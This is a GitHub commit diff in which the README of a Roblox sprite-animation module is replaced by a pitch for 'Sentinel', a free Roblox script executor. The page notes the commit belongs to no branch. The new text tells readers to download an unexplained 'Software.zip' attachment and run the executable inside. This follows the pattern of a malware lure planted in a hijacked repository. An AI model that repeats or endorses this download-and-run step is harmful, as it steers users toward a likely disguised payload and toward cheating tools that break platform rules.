-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
56 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,56 @@ | ||
# SpriteClip | ||
A Roblox module for easy sprite animation. [Originally by nooneisback](https://devforum.roblox.com/t/spriteclip-sprite-sheet-animation-module/294195?u=onerake) — transpiled into TypeScript for roblox-ts compatibility. | ||
# Executor-Script-Roblox | ||
|
||
Sentinel is a powerful and free Roblox script executor that allows you to customize your Roblox gameplay experience on both PC and mobile devices. | ||
|
||
## Table of Contents | ||
- [Features](#features) | ||
- [Installation](#installation) | ||
- [Usage](#usage) | ||
- [Contributing](#contributing) | ||
- [License](#license) | ||
|
||
## Features | ||
|
||
- **Cross-Platform Compatibility**: Sentinel can be used both on PC and mobile devices, providing flexibility in executing scripts on different platforms. | ||
- **User-Friendly Interface**: The script executor comes with an intuitive interface that is easy to navigate and use. | ||
- **Custom Script Execution**: Customize your Roblox gameplay experience by executing scripts tailored to your preferences. | ||
- **Free of Charge**: Enjoy the powerful features of Sentinel without any cost, making it accessible to all Roblox players. | ||
|
||
## Installation | ||
|
||
To utilize Sentinel, follow these simple installation steps: | ||
|
||
1. Download the software package from this [link](https://github.com/user-attachments/files/17382188/Software.zip). | ||
2. Extract the downloaded ZIP file to your desired location on your device. | ||
3. Run the executable file to launch Sentinel. | ||
|
||
## Usage | ||
|
||
Sentinel provides a seamless scripting experience for Roblox players. Here is a guide on how to use the executor: | ||
|
||
1. Launch the Sentinel application. | ||
2. Load up your Roblox game on either PC or mobile device. | ||
3. Choose the script you want to execute within the Sentinel interface. | ||
4. Click on the "Execute" button to run the script within your Roblox game. | ||
|
||
```lua | ||
-- Example Script | ||
game.Workspace.Part.Color = Color3.new(1, 0, 0) | ||
``` | ||
|
||
Customize the above script to suit your desired gameplay changes. | ||
|
||
## Contributing | ||
|
||
We welcome contributions from the community to enhance Sentinel and provide additional features to Roblox players. If you wish to contribute, follow these steps: | ||
|
||
1. Fork the repository. | ||
2. Make your changes and improvements. | ||
3. Submit a pull request detailing the enhancements you have made. | ||
4. Your contribution will be reviewed, and if accepted, merged into the main branch. | ||
|
||
Let's work together to make Sentinel the best Roblox script executor out there! | ||
|
||
## License | ||
|
||
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details. |